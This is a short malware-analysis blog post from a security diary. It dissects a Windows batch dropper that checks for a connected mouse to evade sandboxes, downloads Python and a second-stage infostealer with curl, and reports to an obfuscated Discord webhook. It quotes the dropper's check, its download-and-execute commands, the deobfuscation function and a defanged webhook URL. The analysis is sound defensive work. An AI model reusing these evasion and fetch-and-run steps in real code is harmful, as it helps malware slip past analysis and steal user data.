Simple Anti-Sandbox Technique: Where's The Mouse?

Published: 2024-02-23
Last Updated: 2024-02-23 06:23:46 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Malware samples have plenty of techniques to detect if they are running in a "safe" environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?)

Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]

set "mouseConnected=false"

for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"

if not !mouseConnected! == true (
    exit /b 1

The script uses the WMI ("Windows Management Instrumentation") client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:

C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value




Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.

If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:

set "eee="
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
del !eeee!

Finally, it will download and execute the second stage:

set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw
set ""
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
if %ERRORLEVEL% neq 0 (
    echo Error: Failed to download the webpage.
    exit /b 1
python -m %OUTPUT_FILE%

The second stage is another InfoStealer. Nothing special except the way the DIscord channel used as C2 is obfuscated:

webhook = b'\xc8~~\xc9(T>>\x10\x1e(\x82=\xa1\x10\x95\x82=$>\xbc\xc9\x1e>lM1\xc8=={(>\xb08-Z-\xb3-\x8b8\x8b\x1b\xb0\xb3\xb0\xb08\x87Z\x8b>\xf91\xe0f&\x82g\xe0\xa7g\x98\xf0Y\xd60\xcdX\xb4\xb4\xfe\xa6\xc9\xc9l~Y(g\xf8\x1c&\x82\xd6Nf\x87e\xe0\xf7)\xf70e_,8\xfe\xa6Z\x1c\xe28M\xaf_\xc6,1E\xf7N_\xf2,_\x1b\ne',b'x.\x8d\\V+\xb1c\x94\x9cw\xb5\x8c\t]\x12\r\x91[5y\x8a\x15L\xe5Bq\xd0\xa5\x0c\xd9\xe8\x9f\xdd\x93J\xd4\x88\xb8\x84\xa3K\x02\x0f\xa8E\x95>-\xb08\x87\x8b\x1b\xb3\xf2\x18ZTG\x16\xb2i\xcf\x11\xb4\xf7\x07\x1cuOY\xcd\xe0_,m&\xf0\xaaX\xfeW\xaf\x90\xf9\xc6\xae\xf8\x08\n\x7f\xab\x014e\x9a\xbc1\x82\x10M)f\xc8\x1e\xd6{g$\xe2=\xc9\x98\xa1(~N\xc5l\xa6\xa70\xba/\x053\xb6b\xfd"\xde\xa4h\x9bId\xc1\xc4\xb9\x96\xf3\x83\x06\xbd2H\xc7\xc0\xd5z\xa0\x99ao\xef\x13r\x1dP7\x14v\xa2\xeek\xeb\xe1\xbf9}:R\xe7\'\xbb<DQ\x9e^\xfc\xad%\x8e\x1f\x97\xc2U\x19\x86\x17\x81\xff\xea\xfa\x9dF\xa9p!\xcc#\xc3C\x85\xdc|\xf5j;\xbeA\xec\xe4\x80\xd2\xf4S\xb7\xdb\xe9\x89\xcb\xd76\x0b\xe3`@\x92\x03\xf1s\xfbn\xf6\xd1\xda\xd3\x0e\xd8t\x00\x8f\xed\xe6\xac \xdf\x04\xca?*\x1a\xce'

Is it decrypted using this simple function:

def DeobfuscateWeb(encrypted_text, key):
    decrypted = [0] * 256
    for i, char in enumerate(key):
        decrypted[char] = i

    decrypted_text = []
    for char in encrypted_text:
        decrypted_char = decrypted[char]

    return bytes(decrypted_text)

and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

0 comment(s)


Diary Archives